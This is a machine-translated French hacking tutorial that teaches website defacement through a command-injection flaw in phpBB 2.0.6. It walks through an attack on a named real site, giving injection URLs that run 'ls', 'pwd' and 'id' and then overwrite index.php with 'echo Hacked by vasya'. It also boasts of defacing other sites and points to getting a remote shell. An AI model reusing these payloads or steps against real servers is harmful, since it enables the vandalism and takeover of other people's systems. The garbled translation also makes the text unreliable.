This page has been robot translated, sorry for typos if any. Original content here.

Guide complet de déformation (mis à jour)

Introduction
Je vois souvent la question sur le forum: "Comment décomposer les sites?" ou "Comment redévelopper le site?". Aujourd'hui, vous serez en mesure de défectionner le portail sans effort! Tous les amateurs de proies faciles que j'invite! =)

La partie principale
Aujourd'hui, je vais parler de la façon de faire les différences entre les différents sites, à travers des erreurs dans les scripts populaires. Récemment, un trou de sécurité sérieux a été découvert dans le populaire moteur phpBB.
La vulnérabilité a été détectée dans le module viewtopic.php

Le fait est que l'attaquant distant pourrait exécuter un script php arbitraire sur le système vulnérable lors de la transmission d'une telle ligne viewtopic.php? T = 1 & highlight =% 27

Comme vous l'avez probablement déjà deviné, cette vulnérabilité vous permet d'exécuter des commandes arbitraires de n'importe quelle longueur sur un serveur vulnérable. Aujourd'hui, nous allons utiliser ce trou, et avec vous, nous allons casser le vrai serveur. Notre objectif sera précisément la déformation, c'est-à-dire le remplacement de la page principale du site par la nôtre.

Commençons donc, notre victime sera www.maxmuscle.dk (au moment de la publication, le portail est résistant à la vulnérabilité).
La première chose qui attire notre attention lors de la visite de cette page est qu'elle est construite sur la base du système de portail php-nuke.

Par défaut, phpBB est le forum dans ce système. Nous cliquons sur le lien qui nous mène au forum, (http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&filе=index.php) et nous assurons que c'est phpBB version 2.0.6 .

Nous passons la requête suivante au forum:

http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&filе=viewtopic.php&t=2&highlight=%27.$poster=`$ls`.%27&l s =

et trouve que le moteur a absorbé la ligne, comme en témoigne l'inscription caractéristique au lieu du surnom de l'un des utilisateurs: ") #i". Mais cela ne veut rien dire, nous pouvons facilement rompre l'exécution des commandes sur ce serveur, mais nous ne devinerons pas et essayerons juste de l'exécuter:

http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&filе=viewtopic.php&t=2&highlight=%27.$poster=`$ls`.%27&l s = pwd

Cette commande (pwd) devrait nous montrer le répertoire dans lequel nous sommes maintenant, si cela arrive, il s'ensuit que l'exécution de commandes sur le serveur est possible. C'est ce qui arrive. Le chemin du répertoire / var / www / html / osclux / est affiché. La commande suivante est "id" pour tester notre accès.

Comme nous voyons les droits que nous avons uid = 99 (personne) , c'est les droits du serveur web. Maintenant, nous affichons la liste des dossiers et des fichiers dans le répertoire html_public, en utilisant la commande "dir / var / www / html / osclux" et de trouver que l'index.php dont nous avons besoin pour cette déface se trouve dans ce répertoire.

Nous sommes donc sur la ligne d'arrivée - en exécutant la commande echo Hacked by vasya> index.php , nous afficherons la page principale avec l'inscription "Hacked by vasya". Vérification Il s'est avéré.

Vous avez fait une défiguration.

Au lieu de conclure
C'était de manière si simple que le hackzona.ru a été défiguré, c'est comme ça que le forum sur nsd.ru a été cassé. Je note également que c'est la mise en œuvre la plus simple de ce trou, dans de bonnes conditions, vous pouvez facilement l'inonder sur un serveur en écoutant un port spécifique, un script sur une perle, et obtenir un shell complet sans droits.